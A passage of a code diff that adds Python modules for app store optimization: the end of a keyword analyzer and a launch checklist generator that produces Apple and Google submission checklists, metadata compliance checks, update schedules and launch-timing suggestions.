|
||||||
|
else:
|
||||||
|
return "Competitive - use in description, not title"
|
||||||
|
elif potential_score >= 30:
|
||||||
|
return "Secondary keyword - use for long-tail variations"
|
||||||
|
else:
|
||||||
|
return "Low potential - deprioritize"
|
||||||
|
|
||||||
|
def _generate_comparison_summary(
|
||||||
|
self,
|
||||||
|
primary_keywords: List[Dict[str, Any]],
|
||||||
|
secondary_keywords: List[Dict[str, Any]],
|
||||||
|
long_tail_keywords: List[Dict[str, Any]]
|
||||||
|
) -> str:
|
||||||
|
"""Generate summary of keyword comparison."""
|
||||||
|
summary_parts = []
|
||||||
|
|
||||||
|
summary_parts.append(
|
||||||
|
f"Identified {len(primary_keywords)} high-priority primary keywords."
|
||||||
|
)
|
||||||
|
|
||||||
|
if primary_keywords:
|
||||||
|
top_keyword = primary_keywords[0]['keyword']
|
||||||
|
summary_parts.append(
|
||||||
|
f"Top recommendation: '{top_keyword}' (potential score: {primary_keywords[0]['potential_score']})."
|
||||||
|
)
|
||||||
|
|
||||||
|
summary_parts.append(
|
||||||
|
f"Found {len(secondary_keywords)} secondary keywords for description and metadata."
|
||||||
|
)
|
||||||
|
|
||||||
|
summary_parts.append(
|
||||||
|
f"Discovered {len(long_tail_keywords)} long-tail opportunities with lower competition."
|
||||||
|
)
|
||||||
|
|
||||||
|
return " ".join(summary_parts)
|
||||||
|
|
||||||
|
|
||||||
|
def analyze_keyword_set(keywords_data: List[Dict[str, Any]]) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to analyze a set of keywords.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
keywords_data: List of keyword data dictionaries
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete analysis report
|
||||||
|
"""
|
||||||
|
analyzer = KeywordAnalyzer()
|
||||||
|
return analyzer.compare_keywords(keywords_data)
|
||||||
739
skills/app-store-optimization/launch_checklist.py
Normal file
739
skills/app-store-optimization/launch_checklist.py
Normal file
@@ -0,0 +1,739 @@
|
|||||||
|
"""
|
||||||
|
Launch checklist module for App Store Optimization.
|
||||||
|
Generates comprehensive pre-launch and update checklists.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional
|
||||||
|
from datetime import datetime, timedelta
|
||||||
|
|
||||||
|
|
||||||
|
class LaunchChecklistGenerator:
|
||||||
|
"""Generates comprehensive checklists for app launches and updates."""
|
||||||
|
|
||||||
|
def __init__(self, platform: str = 'both'):
|
||||||
|
"""
|
||||||
|
Initialize checklist generator.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
platform: 'apple', 'google', or 'both'
|
||||||
|
"""
|
||||||
|
if platform not in ['apple', 'google', 'both']:
|
||||||
|
raise ValueError("Platform must be 'apple', 'google', or 'both'")
|
||||||
|
|
||||||
|
self.platform = platform
|
||||||
|
|
||||||
|
def generate_prelaunch_checklist(
|
||||||
|
self,
|
||||||
|
app_info: Dict[str, Any],
|
||||||
|
launch_date: Optional[str] = None
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Generate comprehensive pre-launch checklist.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_info: App information (name, category, target_audience)
|
||||||
|
launch_date: Target launch date (YYYY-MM-DD)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete pre-launch checklist
|
||||||
|
"""
|
||||||
|
checklist = {
|
||||||
|
'app_info': app_info,
|
||||||
|
'launch_date': launch_date,
|
||||||
|
'checklists': {}
|
||||||
|
}
|
||||||
|
|
||||||
|
# Generate platform-specific checklists
|
||||||
|
if self.platform in ['apple', 'both']:
|
||||||
|
checklist['checklists']['apple'] = self._generate_apple_checklist(app_info)
|
||||||
|
|
||||||
|
if self.platform in ['google', 'both']:
|
||||||
|
checklist['checklists']['google'] = self._generate_google_checklist(app_info)
|
||||||
|
|
||||||
|
# Add universal checklist items
|
||||||
|
checklist['checklists']['universal'] = self._generate_universal_checklist(app_info)
|
||||||
|
|
||||||
|
# Generate timeline
|
||||||
|
if launch_date:
|
||||||
|
checklist['timeline'] = self._generate_launch_timeline(launch_date)
|
||||||
|
|
||||||
|
# Calculate completion status
|
||||||
|
checklist['summary'] = self._calculate_checklist_summary(checklist['checklists'])
|
||||||
|
|
||||||
|
return checklist
|
||||||
|
|
||||||
|
def validate_app_store_compliance(
|
||||||
|
self,
|
||||||
|
app_data: Dict[str, Any],
|
||||||
|
platform: str = 'apple'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Validate compliance with app store guidelines.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_data: App data including metadata, privacy policy, etc.
|
||||||
|
platform: 'apple' or 'google'
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Compliance validation report
|
||||||
|
"""
|
||||||
|
validation_results = {
|
||||||
|
'platform': platform,
|
||||||
|
'is_compliant': True,
|
||||||
|
'errors': [],
|
||||||
|
'warnings': [],
|
||||||
|
'recommendations': []
|
||||||
|
}
|
||||||
|
|
||||||
|
if platform == 'apple':
|
||||||
|
self._validate_apple_compliance(app_data, validation_results)
|
||||||
|
elif platform == 'google':
|
||||||
|
self._validate_google_compliance(app_data, validation_results)
|
||||||
|
|
||||||
|
# Determine overall compliance
|
||||||
|
validation_results['is_compliant'] = len(validation_results['errors']) == 0
|
||||||
|
|
||||||
|
return validation_results
|
||||||
|
|
||||||
|
def create_update_plan(
|
||||||
|
self,
|
||||||
|
current_version: str,
|
||||||
|
planned_features: List[str],
|
||||||
|
update_frequency: str = 'monthly'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Create update cadence and feature rollout plan.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
current_version: Current app version
|
||||||
|
planned_features: List of planned features
|
||||||
|
update_frequency: 'weekly', 'biweekly', 'monthly', 'quarterly'
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Update plan with cadence and feature schedule
|
||||||
|
"""
|
||||||
|
# Calculate next versions
|
||||||
|
next_versions = self._calculate_next_versions(
|
||||||
|
current_version,
|
||||||
|
update_frequency,
|
||||||
|
len(planned_features)
|
||||||
|
)
|
||||||
|
|
||||||
|
# Distribute features across versions
|
||||||
|
feature_schedule = self._distribute_features(
|
||||||
|
planned_features,
|
||||||
|
next_versions
|
||||||
|
)
|
||||||
|
|
||||||
|
# Generate "What's New" templates
|
||||||
|
whats_new_templates = [
|
||||||
|
self._generate_whats_new_template(version_data)
|
||||||
|
for version_data in feature_schedule
|
||||||
|
]
|
||||||
|
|
||||||
|
return {
|
||||||
|
'current_version': current_version,
|
||||||
|
'update_frequency': update_frequency,
|
||||||
|
'planned_updates': len(feature_schedule),
|
||||||
|
'feature_schedule': feature_schedule,
|
||||||
|
'whats_new_templates': whats_new_templates,
|
||||||
|
'recommendations': self._generate_update_recommendations(update_frequency)
|
||||||
|
}
|
||||||
|
|
||||||
|
def optimize_launch_timing(
|
||||||
|
self,
|
||||||
|
app_category: str,
|
||||||
|
target_audience: str,
|
||||||
|
current_date: Optional[str] = None
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Recommend optimal launch timing.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_category: App category
|
||||||
|
target_audience: Target audience description
|
||||||
|
current_date: Current date (YYYY-MM-DD), defaults to today
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Launch timing recommendations
|
||||||
|
"""
|
||||||
|
if not current_date:
|
||||||
|
current_date = datetime.now().strftime('%Y-%m-%d')
|
||||||
|
|
||||||
|
# Analyze launch timing factors
|
||||||
|
day_of_week_rec = self._recommend_day_of_week(app_category)
|
||||||
|
seasonal_rec = self._recommend_seasonal_timing(app_category, current_date)
|
||||||
|
competitive_rec = self._analyze_competitive_timing(app_category)
|
||||||
|
|
||||||
|
# Calculate optimal dates
|
||||||
|
optimal_dates = self._calculate_optimal_dates(
|
||||||
|
current_date,
|
||||||
|
day_of_week_rec,
|
||||||
|
seasonal_rec
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'current_date': current_date,
|
||||||
|
'optimal_launch_dates': optimal_dates,
|
||||||
|
'day_of_week_recommendation': day_of_week_rec,
|
||||||
|
'seasonal_considerations': seasonal_rec,
|
||||||
|
'competitive_timing': competitive_rec,
|
||||||
|
'final_recommendation': self._generate_timing_recommendation(
|
||||||
|
optimal_dates,
|
||||||
|
seasonal_rec
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def plan_seasonal_campaigns(
|
||||||
|
self,
|
||||||
|
app_category: str,
|
||||||
|
current_month: int = None
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Identify seasonal opportunities for ASO campaigns.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_category: App category
|
||||||
|
current_month: Current month (1-12), defaults to current
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Seasonal campaign opportunities
|
||||||
|
"""
|
||||||
|
if not current_month:
|
||||||
|
current_month = datetime.now().month
|
||||||
|
|
||||||
|
# Identify relevant seasonal events
|
||||||
|
seasonal_opportunities = self._identify_seasonal_opportunities(
|
||||||
|
app_category,
|
||||||
|
current_month
|
||||||
|
)
|
||||||
|
|
||||||
|
# Generate campaign ideas
|
||||||
|
campaigns = [
|
||||||
|
self._generate_seasonal_campaign(opportunity)
|
||||||
|
for opportunity in seasonal_opportunities
|
||||||
|
]
|
||||||
|
|
||||||
|
return {
|
||||||
|
'current_month': current_month,
|
||||||
|
'category': app_category,
|
||||||
|
'seasonal_opportunities': seasonal_opportunities,
|
||||||
|
'campaign_ideas': campaigns,
|
||||||
|
'implementation_timeline': self._create_seasonal_timeline(campaigns)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _generate_apple_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||||
|
"""Generate Apple App Store specific checklist."""
|
||||||
|
return [
|
||||||
|
{
|
||||||
|
'category': 'App Store Connect Setup',
|
||||||
|
'items': [
|
||||||
|
{'task': 'App Store Connect account created', 'status': 'pending'},
|
||||||
|
{'task': 'App bundle ID registered', 'status': 'pending'},
|
||||||
|
{'task': 'App Privacy declarations completed', 'status': 'pending'},
|
||||||
|
{'task': 'Age rating questionnaire completed', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Metadata (Apple)',
|
||||||
|
'items': [
|
||||||
|
{'task': 'App title (30 chars max)', 'status': 'pending'},
|
||||||
|
{'task': 'Subtitle (30 chars max)', 'status': 'pending'},
|
||||||
|
{'task': 'Promotional text (170 chars max)', 'status': 'pending'},
|
||||||
|
{'task': 'Description (4000 chars max)', 'status': 'pending'},
|
||||||
|
{'task': 'Keywords (100 chars, comma-separated)', 'status': 'pending'},
|
||||||
|
{'task': 'Category selection (primary + secondary)', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Visual Assets (Apple)',
|
||||||
|
'items': [
|
||||||
|
{'task': 'App icon (1024x1024px)', 'status': 'pending'},
|
||||||
|
{'task': 'Screenshots (iPhone 6.7" required)', 'status': 'pending'},
|
||||||
|
{'task': 'Screenshots (iPhone 5.5" required)', 'status': 'pending'},
|
||||||
|
{'task': 'Screenshots (iPad Pro 12.9" if iPad app)', 'status': 'pending'},
|
||||||
|
{'task': 'App preview video (optional but recommended)', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Technical Requirements (Apple)',
|
||||||
|
'items': [
|
||||||
|
{'task': 'Build uploaded to App Store Connect', 'status': 'pending'},
|
||||||
|
{'task': 'TestFlight testing completed', 'status': 'pending'},
|
||||||
|
{'task': 'App tested on required iOS versions', 'status': 'pending'},
|
||||||
|
{'task': 'Crash-free rate > 99%', 'status': 'pending'},
|
||||||
|
{'task': 'All links in app/metadata working', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Legal & Privacy (Apple)',
|
||||||
|
'items': [
|
||||||
|
{'task': 'Privacy Policy URL provided', 'status': 'pending'},
|
||||||
|
{'task': 'Terms of Service URL (if applicable)', 'status': 'pending'},
|
||||||
|
{'task': 'Data collection declarations accurate', 'status': 'pending'},
|
||||||
|
{'task': 'Third-party SDKs disclosed', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
|
||||||
|
def _generate_google_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||||
|
"""Generate Google Play Store specific checklist."""
|
||||||
|
return [
|
||||||
|
{
|
||||||
|
'category': 'Play Console Setup',
|
||||||
|
'items': [
|
||||||
|
{'task': 'Google Play Console account created', 'status': 'pending'},
|
||||||
|
{'task': 'Developer profile completed', 'status': 'pending'},
|
||||||
|
{'task': 'Payment merchant account linked (if paid app)', 'status': 'pending'},
|
||||||
|
{'task': 'Content rating questionnaire completed', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Metadata (Google)',
|
||||||
|
'items': [
|
||||||
|
{'task': 'App title (50 chars max)', 'status': 'pending'},
|
||||||
|
{'task': 'Short description (80 chars max)', 'status': 'pending'},
|
||||||
|
{'task': 'Full description (4000 chars max)', 'status': 'pending'},
|
||||||
|
{'task': 'Category selection', 'status': 'pending'},
|
||||||
|
{'task': 'Tags (up to 5)', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Visual Assets (Google)',
|
||||||
|
'items': [
|
||||||
|
{'task': 'App icon (512x512px)', 'status': 'pending'},
|
||||||
|
{'task': 'Feature graphic (1024x500px)', 'status': 'pending'},
|
||||||
|
{'task': 'Screenshots (2-8 required, phone)', 'status': 'pending'},
|
||||||
|
{'task': 'Screenshots (tablet, if applicable)', 'status': 'pending'},
|
||||||
|
{'task': 'Promo video (YouTube link, optional)', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Technical Requirements (Google)',
|
||||||
|
'items': [
|
||||||
|
{'task': 'APK/AAB uploaded to Play Console', 'status': 'pending'},
|
||||||
|
{'task': 'Internal testing completed', 'status': 'pending'},
|
||||||
|
{'task': 'App tested on required Android versions', 'status': 'pending'},
|
||||||
|
{'task': 'Target API level meets requirements', 'status': 'pending'},
|
||||||
|
{'task': 'All permissions justified', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Legal & Privacy (Google)',
|
||||||
|
'items': [
|
||||||
|
{'task': 'Privacy Policy URL provided', 'status': 'pending'},
|
||||||
|
{'task': 'Data safety section completed', 'status': 'pending'},
|
||||||
|
{'task': 'Ads disclosure (if applicable)', 'status': 'pending'},
|
||||||
|
{'task': 'In-app purchase disclosure (if applicable)', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
|
||||||
|
def _generate_universal_checklist(self, app_info: Dict[str, Any]) -> List[Dict[str, Any]]:
|
||||||
|
"""Generate universal (both platforms) checklist."""
|
||||||
|
return [
|
||||||
|
{
|
||||||
|
'category': 'Pre-Launch Marketing',
|
||||||
|
'items': [
|
||||||
|
{'task': 'Landing page created', 'status': 'pending'},
|
||||||
|
{'task': 'Social media accounts setup', 'status': 'pending'},
|
||||||
|
{'task': 'Press kit prepared', 'status': 'pending'},
|
||||||
|
{'task': 'Beta tester feedback collected', 'status': 'pending'},
|
||||||
|
{'task': 'Launch announcement drafted', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'ASO Preparation',
|
||||||
|
'items': [
|
||||||
|
{'task': 'Keyword research completed', 'status': 'pending'},
|
||||||
|
{'task': 'Competitor analysis done', 'status': 'pending'},
|
||||||
|
{'task': 'A/B test plan created for post-launch', 'status': 'pending'},
|
||||||
|
{'task': 'Analytics tracking configured', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Quality Assurance',
|
||||||
|
'items': [
|
||||||
|
{'task': 'All core features tested', 'status': 'pending'},
|
||||||
|
{'task': 'User flows validated', 'status': 'pending'},
|
||||||
|
{'task': 'Performance testing completed', 'status': 'pending'},
|
||||||
|
{'task': 'Accessibility features tested', 'status': 'pending'},
|
||||||
|
{'task': 'Security audit completed', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'category': 'Support Infrastructure',
|
||||||
|
'items': [
|
||||||
|
{'task': 'Support email/system setup', 'status': 'pending'},
|
||||||
|
{'task': 'FAQ page created', 'status': 'pending'},
|
||||||
|
{'task': 'Documentation for users prepared', 'status': 'pending'},
|
||||||
|
{'task': 'Team trained on handling reviews', 'status': 'pending'}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
|
||||||
|
def _generate_launch_timeline(self, launch_date: str) -> List[Dict[str, Any]]:
|
||||||
|
"""Generate timeline with milestones leading to launch."""
|
||||||
|
launch_dt = datetime.strptime(launch_date, '%Y-%m-%d')
|
||||||
|
|
||||||
|
milestones = [
|
||||||
|
{
|
||||||
|
'date': (launch_dt - timedelta(days=90)).strftime('%Y-%m-%d'),
|
||||||
|
'milestone': '90 days before: Complete keyword research and competitor analysis'
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'date': (launch_dt - timedelta(days=60)).strftime('%Y-%m-%d'),
|
||||||
|
'milestone': '60 days before: Finalize metadata and visual assets'
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'date': (launch_dt - timedelta(days=45)).strftime('%Y-%m-%d'),
|
||||||
|
'milestone': '45 days before: Begin beta testing program'
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'date': (launch_dt - timedelta(days=30)).strftime('%Y-%m-%d'),
|
||||||
|
'milestone': '30 days before: Submit app for review (Apple typically takes 1-2 days, Google instant)'
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'date': (launch_dt - timedelta(days=14)).strftime('%Y-%m-%d'),
|
||||||
|
'milestone': '14 days before: Prepare launch marketing materials'
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'date': (launch_dt - timedelta(days=7)).strftime('%Y-%m-%d'),
|
||||||
|
'milestone': '7 days before: Set up analytics and monitoring'
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'date': launch_dt.strftime('%Y-%m-%d'),
|
||||||
|
'milestone': 'Launch Day: Release app and execute marketing plan'
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'date': (launch_dt + timedelta(days=7)).strftime('%Y-%m-%d'),
|
||||||
|
'milestone': '7 days after: Monitor metrics, respond to reviews, address critical issues'
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'date': (launch_dt + timedelta(days=30)).strftime('%Y-%m-%d'),
|
||||||
|
'milestone': '30 days after: Analyze launch metrics, plan first update'
|
||||||
|
}
|
||||||
|
]
|
||||||
|
|
||||||
|
return milestones
|
||||||
|
|
||||||
|
def _calculate_checklist_summary(self, checklists: Dict[str, List[Dict[str, Any]]]) -> Dict[str, Any]:
|
||||||
|
"""Calculate completion summary."""
|
||||||
|
total_items = 0
|
||||||
|
completed_items = 0
|
||||||
|
|
||||||
|
for platform, categories in checklists.items():
|
||||||
|
for category in categories:
|
||||||
|
for item in category['items']:
|
||||||
|
total_items += 1
|
||||||
|
if item['status'] == 'completed':
|
||||||
|
completed_items += 1
|
||||||
|
|
||||||
|
completion_percentage = (completed_items / total_items * 100) if total_items > 0 else 0
|
||||||
|
|
||||||
|
return {
|
||||||
|
'total_items': total_items,
|
||||||
|
'completed_items': completed_items,
|
||||||
|
'pending_items': total_items - completed_items,
|
||||||
|
'completion_percentage': round(completion_percentage, 1),
|
||||||
|
'is_ready_to_launch': completion_percentage == 100
|
||||||
|
}
|
||||||
|
|
||||||
|
def _validate_apple_compliance(
|
||||||
|
self,
|
||||||
|
app_data: Dict[str, Any],
|
||||||
|
validation_results: Dict[str, Any]
|
||||||
|
) -> None:
|
||||||
|
"""Validate Apple App Store compliance."""
|
||||||
|
# Check for required fields
|
||||||
|
if not app_data.get('privacy_policy_url'):
|
||||||
|
validation_results['errors'].append("Privacy Policy URL is required")
|
||||||
|
|
||||||
|
if not app_data.get('app_icon'):
|
||||||
|
validation_results['errors'].append("App icon (1024x1024px) is required")
|
||||||
|
|
||||||
|
# Check metadata character limits
|
||||||
|
title = app_data.get('title', '')
|
||||||
|
if len(title) > 30:
|
||||||
|
validation_results['errors'].append(f"Title exceeds 30 characters ({len(title)})")
|
||||||
|
|
||||||
|
# Warnings for best practices
|
||||||
|
subtitle = app_data.get('subtitle', '')
|
||||||
|
if not subtitle:
|
||||||
|
validation_results['warnings'].append("Subtitle is empty - consider adding for better discoverability")
|
||||||
|
|
||||||
|
keywords = app_data.get('keywords', '')
|
||||||
|
if len(keywords) < 80:
|
||||||
|
validation_results['warnings'].append(
|
||||||
|
f"Keywords field underutilized ({len(keywords)}/100 chars) - add more keywords"
|
||||||
|
)
|
||||||
|
|
||||||
|
def _validate_google_compliance(
|
||||||
|
self,
|
||||||
|
app_data: Dict[str, Any],
|
||||||
|
validation_results: Dict[str, Any]
|
||||||
|
) -> None:
|
||||||
|
"""Validate Google Play Store compliance."""
|
||||||
|
# Check for required fields
|
||||||
|
if not app_data.get('privacy_policy_url'):
|
||||||
|
validation_results['errors'].append("Privacy Policy URL is required")
|
||||||
|
|
||||||
|
if not app_data.get('feature_graphic'):
|
||||||
|
validation_results['errors'].append("Feature graphic (1024x500px) is required")
|
||||||
|
|
||||||
|
# Check metadata character limits
|
||||||
|
title = app_data.get('title', '')
|
||||||
|
if len(title) > 50:
|
||||||
|
validation_results['errors'].append(f"Title exceeds 50 characters ({len(title)})")
|
||||||
|
|
||||||
|
short_desc = app_data.get('short_description', '')
|
||||||
|
if len(short_desc) > 80:
|
||||||
|
validation_results['errors'].append(f"Short description exceeds 80 characters ({len(short_desc)})")
|
||||||
|
|
||||||
|
# Warnings
|
||||||
|
if not short_desc:
|
||||||
|
validation_results['warnings'].append("Short description is empty")
|
||||||
|
|
||||||
|
def _calculate_next_versions(
|
||||||
|
self,
|
||||||
|
current_version: str,
|
||||||
|
update_frequency: str,
|
||||||
|
feature_count: int
|
||||||
|
) -> List[str]:
|
||||||
|
"""Calculate next version numbers."""
|
||||||
|
# Parse current version (assume semantic versioning)
|
||||||
|
parts = current_version.split('.')
|
||||||
|
major, minor, patch = int(parts[0]), int(parts[1]), int(parts[2] if len(parts) > 2 else 0)
|
||||||
|
|
||||||
|
versions = []
|
||||||
|
for i in range(feature_count):
|
||||||
|
if update_frequency == 'weekly':
|
||||||
|
patch += 1
|
||||||
|
elif update_frequency == 'biweekly':
|
||||||
|
patch += 1
|
||||||
|
elif update_frequency == 'monthly':
|
||||||
|
minor += 1
|
||||||
|
patch = 0
|
||||||
|
else: # quarterly
|
||||||
|
minor += 1
|
||||||
|
patch = 0
|
||||||
|
|
||||||
|
versions.append(f"{major}.{minor}.{patch}")
|
||||||
|
|
||||||
|
return versions
|
||||||
|
|
||||||
|
def _distribute_features(
|
||||||
|
self,
|
||||||
|
features: List[str],
|
||||||
|
versions: List[str]
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""Distribute features across versions."""
|
||||||
|
features_per_version = max(1, len(features) // len(versions))
|
||||||
|
|
||||||
|
schedule = []
|
||||||
|
for i, version in enumerate(versions):
|
||||||
|
start_idx = i * features_per_version
|
||||||
|
end_idx = start_idx + features_per_version if i < len(versions) - 1 else len(features)
|
||||||
|
|
||||||
|
schedule.append({
|
||||||
|
'version': version,
|
||||||
|
'features': features[start_idx:end_idx],
|
||||||
|
'release_priority': 'high' if i == 0 else ('medium' if i < len(versions) // 2 else 'low')
|
||||||
|
})
|
||||||
|
|
||||||
|
return schedule
|
||||||
|
|
||||||
|
def _generate_whats_new_template(self, version_data: Dict[str, Any]) -> Dict[str, str]:
|
||||||
|
"""Generate What's New template for version."""
|
||||||
|
features_list = '\n'.join([f"• {feature}" for feature in version_data['features']])
|
||||||
|
|
||||||
|
template = f"""Version {version_data['version']}
|
||||||
|
|
||||||
|
{features_list}
|
||||||
|
|
||||||
|
We're constantly improving your experience. Thanks for using [App Name]!
|
||||||
|
|
||||||
|
Have feedback? Contact us at support@[company].com"""
|
||||||
|
|
||||||
|
return {
|
||||||
|
'version': version_data['version'],
|
||||||
|
'template': template
|
||||||
|
}
|
||||||
|
|
||||||
|
def _generate_update_recommendations(self, update_frequency: str) -> List[str]:
|
||||||
|
"""Generate recommendations for update strategy."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
if update_frequency == 'weekly':
|
||||||
|
recommendations.append("Weekly updates show active development but ensure quality doesn't suffer")
|
||||||
|
elif update_frequency == 'monthly':
|
||||||
|
recommendations.append("Monthly updates are optimal for most apps - balance features and stability")
|
||||||
|
|
||||||
|
recommendations.extend([
|
||||||
|
"Include bug fixes in every update",
|
||||||
|
"Update 'What's New' section with each release",
|
||||||
|
"Respond to reviews mentioning fixed issues"
|
||||||
|
])
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _recommend_day_of_week(self, app_category: str) -> Dict[str, Any]:
|
||||||
|
"""Recommend best day of week to launch."""
|
||||||
|
# General recommendations based on category
|
||||||
|
if app_category.lower() in ['games', 'entertainment']:
|
||||||
|
return {
|
||||||
|
'recommended_day': 'Thursday',
|
||||||
|
'rationale': 'People download entertainment apps before weekend'
|
||||||
|
}
|
||||||
|
elif app_category.lower() in ['productivity', 'business']:
|
||||||
|
return {
|
||||||
|
'recommended_day': 'Tuesday',
|
||||||
|
'rationale': 'Business users most active mid-week'
|
||||||
|
}
|
||||||
|
else:
|
||||||
|
return {
|
||||||
|
'recommended_day': 'Wednesday',
|
||||||
|
'rationale': 'Mid-week provides good balance and review potential'
|
||||||
|
}
|
||||||
|
|
||||||
|
def _recommend_seasonal_timing(self, app_category: str, current_date: str) -> Dict[str, Any]:
|
||||||
|
"""Recommend seasonal timing considerations."""
|
||||||
|
current_dt = datetime.strptime(current_date, '%Y-%m-%d')
|
||||||
|
month = current_dt.month
|
||||||
|
|
||||||
|
# Avoid certain periods
|
||||||
|
avoid_periods = []
|
||||||
|
if month == 12:
|
||||||
|
avoid_periods.append("Late December - low user engagement during holidays")
|
||||||
|
if month in [7, 8]:
|
||||||
|
avoid_periods.append("Summer months - some categories see lower engagement")
|
||||||
|
|
||||||
|
# Recommend periods
|
||||||
|
good_periods = []
|
||||||
|
if month in [1, 9]:
|
||||||
|
good_periods.append("New Year/Back-to-school - high user engagement")
|
||||||
|
if month in [10, 11]:
|
||||||
|
good_periods.append("Pre-holiday season - good for shopping/gift apps")
|
||||||
|
|
||||||
|
return {
|
||||||
|
'current_month': month,
|
||||||
|
'avoid_periods': avoid_periods,
|
||||||
|
'good_periods': good_periods
|
||||||
|
}
|
||||||
|
|
||||||
|
def _analyze_competitive_timing(self, app_category: str) -> Dict[str, str]:
|
||||||
|
"""Analyze competitive timing considerations."""
|
||||||
|
return {
|
||||||
|
'recommendation': 'Research competitor launch schedules in your category',
|
||||||
|
'strategy': 'Avoid launching same week as major competitor updates'
|
||||||
|
}
|
||||||
|
|
||||||
|
def _calculate_optimal_dates(
|
||||||
|
self,
|
||||||
|
current_date: str,
|
||||||
|
day_rec: Dict[str, Any],
|
||||||
|
seasonal_rec: Dict[str, Any]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Calculate optimal launch dates."""
|
||||||
|
current_dt = datetime.strptime(current_date, '%Y-%m-%d')
|
||||||
|
|
||||||
|
# Find next occurrence of recommended day
|
||||||
|
target_day = day_rec['recommended_day']
|
||||||
|
days_map = {'Monday': 0, 'Tuesday': 1, 'Wednesday': 2, 'Thursday': 3, 'Friday': 4}
|
||||||
|
target_day_num = days_map.get(target_day, 2)
|
||||||
|
|
||||||
|
days_ahead = (target_day_num - current_dt.weekday()) % 7
|
||||||
|
if days_ahead == 0:
|
||||||
|
days_ahead = 7
|
||||||
|
|
||||||
|
next_target_date = current_dt + timedelta(days=days_ahead)
|
||||||
|
|
||||||
|
optimal_dates = [
|
||||||
|
next_target_date.strftime('%Y-%m-%d'),
|
||||||
|
(next_target_date + timedelta(days=7)).strftime('%Y-%m-%d'),
|
||||||
|
(next_target_date + timedelta(days=14)).strftime('%Y-%m-%d')
|
||||||
|
]
|
||||||
|
|
||||||
|
return optimal_dates
|
||||||
|
|
||||||
|
def _generate_timing_recommendation(
|
||||||
|
self,
|
||||||
|
optimal_dates: List[str],
|
||||||
|
seasonal_rec: Dict[str, Any]
|
||||||
|
) -> str:
|
||||||
|
"""Generate final timing recommendation."""
|
||||||
|
if seasonal_rec['avoid_periods']:
|
||||||
|
return f"Consider launching in {optimal_dates[1]} to avoid {seasonal_rec['avoid_periods'][0]}"
|
||||||
|
elif seasonal_rec['good_periods']:
|
||||||
|
return f"Launch on {optimal_dates[0]} to capitalize on {seasonal_rec['good_periods'][0]}"
|
||||||
|
else:
|
||||||
|
return f"Recommended launch date: {optimal_dates[0]}"
|
||||||
|
|
||||||
|
def _identify_seasonal_opportunities(
|
||||||
|
self,
|
||||||
|
app_category: str,
|
||||||
|
current_month: int
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""Identify seasonal opportunities for category."""
|
||||||
|
opportunities = []
|
||||||
|
|
||||||
|
# Universal opportunities
|
||||||
|
if current_month == 1:
|
||||||
|
opportunities.append({
|
||||||
|
'event': 'New Year Resolutions',
|
||||||
|
'dates': 'January 1-31',
|
||||||
|
'relevance': 'high' if app_category.lower() in ['health', 'fitness', 'productivity'] else 'medium'
|
||||||
|
})
|
||||||
|
